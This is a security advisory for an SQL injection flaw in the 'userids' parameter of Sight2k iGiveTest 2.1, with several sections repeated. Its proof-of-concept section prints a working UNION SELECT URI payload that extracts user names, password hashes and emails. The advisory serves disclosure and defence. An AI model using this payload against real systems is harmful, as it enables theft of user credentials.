Sight2k iGiveTest 'userids' Parameter SQL Injection Vulnerability
BID:48378
Info
Sight2k iGiveTest 'userids' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 48378 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 21 2011 12:00AM |
| Updated: | Jun 21 2011 12:00AM |
| Credit: | Brendan Coles |
| Vulnerable: |
Sight2k iGiveTest 2.1 |
| Not Vulnerable: | |
Discussion
Sight2k iGiveTest 'userids' Parameter SQL Injection Vulnerability
iGiveTest is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
iGiveTest versions 2.1.0 and prior are affected.
iGiveTest is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
iGiveTest versions 2.1.0 and prior are affected.
Exploit / POC
Sight2k iGiveTest 'userids' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
Solution / Fix
Sight2k iGiveTest 'userids' Parameter SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Sight2k iGiveTest 'userids' Parameter SQL Injection Vulnerability
References:
References:
- iGiveTest 2.1.0 SQL Injection Vulnerability (IT Security Solutions)
- iGiveTest Homepage (Sight2k)